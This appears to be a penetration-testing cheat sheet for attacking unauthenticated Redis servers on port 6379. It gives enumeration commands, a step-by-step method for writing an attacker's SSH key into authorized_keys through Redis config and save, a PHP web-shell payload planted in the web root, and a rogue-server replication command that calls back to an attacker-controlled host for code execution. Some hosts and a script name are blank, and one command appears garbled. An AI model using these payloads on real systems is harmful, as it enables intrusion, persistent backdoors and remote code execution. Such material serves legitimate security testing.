Port 6379

  • By default Redis can be accessed without credentials

#Basic Enum
[ ... Redis response with info ... ]
client list
[ ... Redis response with connected clients ... ]
[ ... Get config ... ]
config get dir

#Empty Database

Write Files > SSH Access

  • In the output of config get dir you could find the home of the redis user (usually /var/lib/redis or /home/redis/.ssh), and knowing this you know where you can write the authenticated_users file to access via ssh with the user redis. If you know the home of other valid user where you have writable permissions you can also abuse it

#Generate RSA Key Pair
ssh-keygen -t rsa -C ""

#Save as .txt with padding
(echo -e "\n\n"; cat; echo -e "\n\n") > foo.txt

redis-cli -h> config set dbfilename "backup.rdb"
OK> save

redis-cli -h echo flushall
cat foo.txt | redis-cli -h -x set crackit

#Dump our memory content into the authorized_keys file
redis-cli -h> config set dir /Users/antirez/.ssh/
OK> config get dir
1) "dir"
2) "/Users/antirez/.ssh"> config set dbfilename "authorized.keys"
OK> save

#SSH into host
ssh -i id_rsa antirez@

Write Files > PHP Web Shell

  • Requires a web service running

config set dir /var/www/html
config set dbfilename sys.php
set test "<?php system($_REQUEST['cmd']); ?>"
#set test "<?php phpinfo(); ?>"

Rogue Server Sync Code Exec

python3 --rhost <Target> --rport 6379 --lhost --lport 6381

Last updated